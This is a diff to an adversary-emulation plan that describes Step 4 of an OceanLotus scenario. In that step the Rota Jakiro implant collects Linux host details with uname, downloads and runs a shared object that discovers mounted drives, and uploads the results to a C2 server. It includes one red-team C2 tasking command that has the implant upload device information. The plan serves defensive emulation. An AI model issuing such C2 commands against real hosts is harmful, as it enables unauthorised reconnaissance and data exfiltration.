center-for-threat-informed-defense/adversary_emulation_library/ocean_lotus/Emulation_Plan/OceanLotus_Scenario.md

 ## Step 4 - Discovery on Linux Host
 ### 📖 Overview

-Step 4 emulates OceanLotus executing a shared object that conducts System information discovery using the `uname` syscall.
+**Step 4 ** emulates OceanLotus executing conducting discovery on the Linux host.

-The following information is collected.
-- Host name
-- Architecture
-- Kernel version
+For initial collection, Rota Jakiro executes and collects the results from the `uname` syscall.
+Rota Jakiro sends the following information regarding the Linux host to the C2 server: Host name, Architecture, & Kernel version.
+Rota Jakiro then downloads and executes a shared object (mount.so file) performing discovery for mounted drives connected to the Linux host.
+The resulting information is saved to the `mount.txt` file.
+Rota Jakiro then uploads this file to the C2 server for offline analysis.

 ---
 ### 👾 Red Team Procedures

-1. Use Rota Jakiro to collect the device information from the target.
+1. Use Rota Jakiro to collect the device information from the target using the `uname` syscall.
    ```
    ./evalsC2client.py --set-task 01020304 '{"cmd":"Rota_upload_dev_info"}'
    ```